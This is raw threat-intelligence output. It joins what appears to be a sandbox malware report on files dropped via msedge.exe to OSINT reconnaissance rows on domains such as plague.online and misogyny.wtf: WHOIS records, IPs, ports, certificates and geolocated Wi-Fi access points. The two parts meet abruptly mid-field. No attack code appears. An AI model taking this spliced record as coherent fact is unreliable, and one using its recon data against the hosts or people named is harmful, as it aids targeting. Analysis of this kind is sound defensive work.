"Part-ES" has type "data"- Location: [%TEMP%\\2268_1205038581\\Part-ES]- [targetUID: 00000000-00002268]\n "7d1d317b-474f-454f-9a8f-99191e2e1ce8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7d1d317b-474f-454f-9a8f-99191e2e1ce8.tmp]- [targetUID: 00000000-00002268]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\2268_1205038581\\LICENSE]- [targetUID: 00000000-00002268]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2268_1205038581\\Part-RU]- [targetUID: 00000000-00002268]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00002268]\n "e93703ec-1b1f-4cd8-ac7e-72ecaace237e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e93703ec-1b1f-4cd8-ac7e-72ecaace237e.tmp]- [targetUID: 00000000-00002268]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00002268]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2268_1812474118\\auto_open_controller.js]- [targetUID: 00000000-00002268]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://themozigames.repl.co/"\n Pattern match: "https://themozigames.repl.co"\n Heuristic match: "themozigames.repl.co"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "product_page.js" - Location: [%TEMP%\\2268_1812474118\\product_page.js]- [targetUID: 00000000-00002268]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\2268_1812474118\\auto_open_controller.js]- [targetUID: 00000000-00002268]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\2268_1812474118\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002268]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\2268_1812474118\\edge_tracking_page_validator.js]- [targetUID: 00000000-00002268]\n Dropped file: "shopping.js" - Location: [%TEMP%\\2268_1812474118\\shopping.js]- [targetUID: 00000000-00002268]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\2268_1812474118\\edge_driver.js]- [targetUID: 00000000-00002268]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\2268_1812474118\\shopping_iframe_driver.js]- [targetUID: 00000000-00002268]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\2268_1812474118\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002268]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\2268_1205038581\\adblock_snippet.js]- [targetUID: 00000000-00002268]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\2268_1812474118\\shoppingfre.js]- [targetUID: 00000000-00002268]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', 
u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\2268_478418729\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00002268]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2268_1205038581\\Part-RU]- [targetUID: 00000000-00002268]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-43', u'name': u'Writes a PE file header to disc', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 6, u'description': u'"msedge.exe" wrote 8192 bytes starting with PE header signature to file "%TEMP%\\2268_478418729\\_platform_specific\\win_x64\\widevinecdm.dll": 4d5a78000100000004000000000000000 34.149.204.188 2022-12-18 00:31:52 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None westabuse@gmail.com Domain Name: PLAGUE.ONLINE Registry Domain ID: D209164753-CNIC Registrar WHOIS Server: whois.west.cn Registrar URL: http://www.west.cn Updated Date: 2022-12-16T12:58:58.0Z Creation Date: 2020-11-15T10:10:12.0Z Registry Expiry Date: 2023-11-15T23:59:59.0Z Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD. Registrar IANA ID: 1556 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Wei Cao Registrant State/Province: Jiang Su Registrant Country: CN Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS4.MYHOSTADMIN.NET Name Server: NS5.MYHOSTADMIN.NET Name Server: NS1.MYHOSTADMIN.NET Name Server: NS2.MYHOSTADMIN.NET Name Server: NS3.MYHOSTADMIN.NET DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@west.cn Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:46.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. 
Domain Name: plague.online Registry Domain ID: zdns-xyz52160522 Registrar WHOIS Server: whois.west.cn Registrar URL: www.west.cn Updated Date: 2020-11-15T10:10:12.0Z Creation Date: 2020-11-15T10:10:12.0Z Registrar Registration Expiration Date: 2023-11-15T23:59:59.0Z Registrar: Chengdu west dimension digital technology Co., LTD Registrar IANA ID: 1556 Reseller: Domain Status: ok http://www.icann.org/epp#ok Registry Registrant ID: Not Available From Registry Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Jiang Su Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CN Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: Registrant Email: link at https://www.west.cn/web/whoisform?domain=plague.online Registry Admin ID: Not Available From Registry Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: Admin Email: link at https://www.west.cn/web/whoisform?domain=plague.online Registry Tech ID: Not Available From Registry Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: Tech Email: link at https://www.west.cn/web/whoisform?domain=plague.online Name Server: ns1.myhostadmin.net Name Server: ns2.myhostadmin.net DNSSEC: signedDelegation Registrar Abuse Contact Email: 
westabuse@gmail.com Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:31:48.0Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SpaceStation (Net ID: 00:02:2D:01:CF:F8) 37.780462,-122.390564 2022-12-18 00:09:14 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.2:443 188.114.96.0/24 2022-12-18 00:09:45 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.9:443 188.114.96.9 2022-12-18 00:37:18 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: PRGMR.COM Registry Domain ID: 70002607_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.joker.com Registrar URL: http://www.joker.com Updated Date: 2022-05-22T20:37:35Z Creation Date: 2001-04-26T22:09:32Z Registry Expiry Date: 2023-04-26T22:09:32Z Registrar: CSL Computer Service Langenbach GmbH d/b/a joker.com Registrar IANA ID: 113 Registrar Abuse Contact Email: abuse@joker.com Registrar Abuse Contact Phone: +49.21186767447 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: NS.PRGMR.COM Name Server: NS2.PRGMR.COM Name Server: NS3.PRGMR.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:37:12Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. 
TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. 
Domain Name: prgmr.com Registry Domain ID: 70002607_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.joker.com Registrar URL: https://joker.com Updated Date: 2022-05-22T20:37:35Z Creation Date: 2001-04-27T00:09:53Z Registrar Registration Expiration Date: 2023-04-26T22:09:32Z Registrar: CSL Computer Service Langenbach GmbH d/b/a joker.com Registrar IANA ID: 113 Registrar Abuse Contact Email: abuse@joker.com Registrar Abuse Contact Phone: +49.21186767447 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Prgmr.com, Inc Registrant State/Province: ca Registrant Country: US Registrant Email: https://csl-registrar.com/contact/prgmr.com/owner Admin Email: https://csl-registrar.com/contact/prgmr.com/admin Tech Email: https://csl-registrar.com/contact/prgmr.com/tech Name Server: ns.prgmr.com Name Server: ns2.prgmr.com Name Server: ns3.prgmr.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:37:18Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTE: By submitting a WHOIS query, you agree to abide by the following NOTE: terms of use: You agree that you may use this data only for lawful NOTE: purposes and that under no circumstances will you use this data to: NOTE: (1) allow, enable, or otherwise support the transmission of mass NOTE: unsolicited, commercial advertising or solicitations via direct mail, NOTE: e-mail, telephone, or facsimile; or (2) enable high volume, automated, NOTE: electronic processes that apply to Joker.com (or its computer systems). NOTE: The compilation, repackaging, dissemination or other use of this data NOTE: is expressly prohibited without the prior written consent of Joker.com. 
plague.xen.prgmr.com 2022-12-18 00:10:04 Web Server No URLScan.io 0 0 1 0 None Werkzeug/2.2.2 Python/3.9.11 misogyny.wtf 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2052 104.21.19.243 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77a965aafc2c2b03-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.0 2022-12-18 00:20:59 BGP AS Membership No Censys 0 0 2 0 None 13335 2606:4700:3033::6815:1cf0 2022-12-18 00:09:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.0:8443 188.114.96.0/24 2022-12-18 00:27:16 Physical Location No MetaDefender 0 0 2 0 None Medellin, Colombia 188.114.96.3 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 2cdc0387-f453-4585-abc6-b131de9f7b91.id.repl.co 34.149.204.188 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None dvdbeyond (Net ID: 00:01:24:F2:B3:12) 37.780462,-122.390564 2022-12-18 00:19:06 Physical Location No ipstack 0 0 3 0 None Italy 81.88.58.196 2022-12-18 00:11:48 Malicious IP on Same Subnet Yes Greensnow 0 0 2 0 None greensnow.co [20.192.0.0/10] https://blocklist.greensnow.co/greensnow.txt 20.192.0.0/10 2022-12-18 00:08:11 Netblock Membership No RIPE 6 0 1 0 None 20.192.0.0/10 20.195.209.219 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None ecuadopichi--ecuado30499f.repl.co 34.149.204.188 2022-12-18 00:03:16 
Internet Name - Unresolved No DNS Resolver 0 0 2 0 None stream.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:5f:2b:c4:e2:52:ac:ba:5b:55:25:2b:3c:57:78:0c:6b:4f Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Apr 9 16:42:21 2022 GMT Not After : Jul 8 16:42:20 2022 GMT Subject: CN=stream.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:f0:74:08:94:b1:0e:3a:f5:ab:5d:27:9f:a1:13: 26:4a:b8:88:b4:cd:16:65:28:29:5d:0c:65:22:96: 16:e9:20:24:42:3d:6d:35:0e:c1:28:8c:4a:28:75: c3:5b:63:81:00:5f:79:35:b2:8c:de:87:22:b0:ad: a6:67:62:40:d8:17:58:b3:75:0e:b6:2f:73:f2:ea: eb:e0:8f:76:26:50:9a:16:11:75:b8:95:2c:97:e5: b9:e5:63:e7:51:d3:eb:e7:99:34:6a:cf:cc:fb:cf: db:aa:47:5b:d5:56:1a:8d:93:2c:fd:ff:26:75:37: d0:62:e4:63:b7:38:a8:b2:e3:d7:82:92:52:ce:b0: af:e9:42:c7:ca:4f:21:55:20:92:35:54:9c:65:7a: ce:69:96:a3:18:10:90:ac:b1:94:6c:06:cb:1d:e6: f3:8c:63:be:4d:c3:b6:5c:e7:73:eb:aa:34:c4:16: b2:55:9f:e1:5e:c9:6e:3c:a6:a1:4e:ce:ba:1c:93: 9b:8f:97:87:77:b0:cc:86:0e:ec:a3:31:e9:6a:17: 0a:2c:ea:72:83:72:e9:ad:a4:a9:77:f3:4c:21:11: 4e:be:f0:d4:f6:9c:70:8a:00:15:78:65:11:81:45: 14:10:49:bf:49:44:94:90:4c:18:e2:6e:b5:c1:88: 5e:37 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: C9:18:99:93:EB:0E:8F:DB:EF:08:28:03:69:26:F5:7B:25:61:0A:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:stream.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical 
NULL Signature Algorithm: sha256WithRSAEncryption 69:40:ed:22:fe:60:b0:02:ad:3a:4e:78:f4:bb:89:96:9b:b5: ab:72:8b:0b:df:3a:e4:b1:98:69:7b:5e:f5:09:60:f2:7d:89: d6:4c:d4:92:b7:7b:25:4a:8d:f7:24:18:e5:1e:dd:40:a6:e9: d8:00:0d:09:02:72:b2:7c:1b:ae:00:0b:34:5c:a9:e8:f3:b5: 24:0c:54:57:a3:b2:38:72:b7:2c:e5:ec:06:fe:84:a5:06:77: 1e:75:01:de:a0:8e:a6:1c:0f:c3:1f:cf:a5:46:73:df:e8:29: c9:f2:53:1b:60:56:ef:a2:a8:f8:bb:1d:d7:86:fe:80:75:97: e4:9c:94:44:f3:55:56:85:31:11:bc:51:28:73:2d:c4:06:9c: e3:59:07:bd:ef:a5:9a:4d:8c:29:86:3c:cf:72:5c:a8:09:99: a0:c1:3a:ca:77:e1:33:db:d8:bc:a1:0a:ed:05:40:f7:c4:fd: 61:82:b2:93:37:d2:a2:93:53:4d:c2:46:10:31:30:86:f7:2c: 13:5e:16:4e:f1:da:57:ba:4c:8f:70:fe:9c:d4:4d:8d:48:4c: 19:b9:9c:71:58:e6:d3:91:96:76:59:42:f8:54:b6:86:52:b4: 14:64:b1:08:ba:2f:27:33:22:9f:33:14:ec:1e:dd:aa:f2:97: b7:2b:3c:4f 2022-12-18 00:20:56 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2606:4700:3031::ac43:93e6 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None infoworld (Net ID: 00:02:2D:04:D1:DB) 37.780462,-122.390564 2022-12-18 00:22:01 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b1f860dd0c2bbd-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 2a06:98c1:3121::1 2022-12-18 00:21:41 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-11-20T15:07:59.768Z", "ip": "20.226.56.97", "location_updated_at": "2022-12-18T00:21:37.986540Z", "autonomous_system_updated_at": "2022-12-18T00:21:37.986540Z", "location": {"province": "Sao Paulo", "city": "Campinas", "country": "Brazil", "coordinates": {"latitude": -22.9035, "longitude": -47.0565}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", 
"country_code": "BR", "timezone": "America/Sao_Paulo", "continent": "South America"}, "services": [], "autonomous_system": {"bgp_prefix": "20.192.0.0/10", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 20.226.56.97 2022-12-18 00:07:17 Linked URL - External No Web Spider 0 0 2 0 None https://i.imgur.com/W2gQQnU.png http://misogyny.wtf:2020/parser 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.7.179 2022-12-18 00:04:38 Malicious IP Address Yes Maltiverse 0 1 2 0 None Maltiverse [188.114.97.0] 188.114.97.0 2022-12-18 00:12:24 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'SP', u'country_tld': u'.br', u'ip': u'20.226.56.97', u'currency_name': u'Real', u'currency': u'BRL', u'country_population': 209469333, u'country_code': u'BR', u'timezone': u'America/Sao_Paulo', u'city': u'Campinas', u'network': u'20.226.0.0/16', u'languages': u'pt-BR,es,en,fr', u'version': u'IPv4', u'latitude': -22.9035, u'in_eu': False, u'utc_offset': u'-0300', u'continent_code': u'SA', u'country_name': u'Brazil', u'country_capital': u'Brasilia', u'org': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'postal': None, u'asn': u'AS8075', u'country': u'BR', u'region': u'Sao Paulo', u'longitude': -47.0565, u'country_calling_code': u'+55', u'country_area': 8511965.0, u'country_code_iso3': u'BRA'} 20.226.56.97 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None zoom (Net ID: 00:01:38:A4:44:3A) 37.780462,-122.390564 2022-12-18 00:04:28 Name Server (DNS NS Records) No DNS Raw Records 0 0 1 0 None journey.ns.cloudflare.com rasputain.fr 2022-12-18 00:12:26 Physical Location No 
ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3031::6815:7b3 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet24CE (Net ID: 00:01:36:59:24:CC) 37.7803446,-122.3906132 2022-12-18 00:22:14 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 172.67.169.215 2022-12-18 00:21:34 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ae242be84c2331-ORD Content-Encoding: gzip 104.21.19.243 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.137.37 2022-12-18 00:16:54 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 2 0 None Blocked by CloudFlare DNS [ftp.zerotwo-best-waifu.online] ftp.zerotwo-best-waifu.online 2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77ad7e4fd9eb22cf-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": 
[""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.169.215 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None yahvehseencargaradebendecirmehoymismo.dios12xx.repl.co 34.149.204.188 2022-12-18 00:20:47 Web Content Language No Language Detector 0 0 3 0 None English Not configured webmail
2022-12-18 00:18:03 Raw Data from RIRs No Tool - WhatWeb 1 0 2 0 None [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://webmail.zerotwo-best-waifu.online', u'http_status': 200, u'plugins': {u'JQuery': {u'version': [u'3.5.0']}, u'Script': {u'string': [u'text/javascript']}, u'Country': {u'string': [u'ITALY'], u'module': [u'IT']}, u'Title': {u'string': [u'Not configured webmail']}, u'HTML5': {}, u'IP': {u'string': [u'81.88.48.102']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}}}, {}] webmail.zerotwo-best-waifu.online 2022-12-18 00:09:50 Co-Hosted Site No HackerTarget 0 0 2 0 None baysicqua.ga 172.67.147.230 2022-12-18 00:24:03 Similar Domain - Whois No Whois 0 0 2 0 None Domain name: plague.nl Status: active Registrar: Sonexo B.V. Edeseweg 52 6721JX BENNEKOM Netherlands Abuse Contact: Creation Date: 2016-01-27 Updated Date: 2017-07-17 DNSSEC: yes Domain nameservers: ns1.sonexo.eu ns2.sonexo.com Record maintained by: NL Domain Registry Copyright notice No part of this publication may be reproduced, published, stored in a retrieval system, or transmitted, in any form or by any means, electronic, mechanical, recording, or otherwise, without prior permission of the Foundation for Internet Domain Registration in the Netherlands (SIDN). These restrictions apply equally to registrars, except in that reproductions and publications are permitted insofar as they are reasonable, necessary and solely in the context of the registration activities referred to in the General Terms and Conditions for .nl Registrars. Any use of this material for advertising, targeting commercial offers or similar activities is explicitly forbidden and liable to result in legal action. Anyone who is aware or suspects that such activities are taking place is asked to inform the Foundation for Internet Domain Registration in the Netherlands. 
(c) The Foundation for Internet Domain Registration in the Netherlands (SIDN) Dutch Copyright Act, protection of authors' rights (Section 10, subsection 1, clause 1). plague.nl 2022-12-18 00:04:28 Raw DNS Records No DNS Raw Records 0 0 1 0 None misogyny.wtf. 1800 IN TXT "v=spf1 include:spf.efwd.registrar-servers.com ~all" misogyny.wtf 2022-12-18 00:07:17 Linked URL - Internal No Web Spider 4 0 2 0 None http://misogyny.wtf/parser http://misogyny.wtf:2020/parser 2022-12-18 00:26:31 Physical Location No MetaDefender 0 0 2 0 None San Jose, United States 104.21.7.179 2022-12-18 00:10:04 Web Server No URLScan.io 0 1 1 0 None Werkzeug/2.0.3 Python/3.9.0 rasputain.fr 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None hj92.gh67.repl.co 34.149.204.188 2022-12-18 00:11:07 Similar Domain - Whois No Whois 2 0 2 0 None %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. 
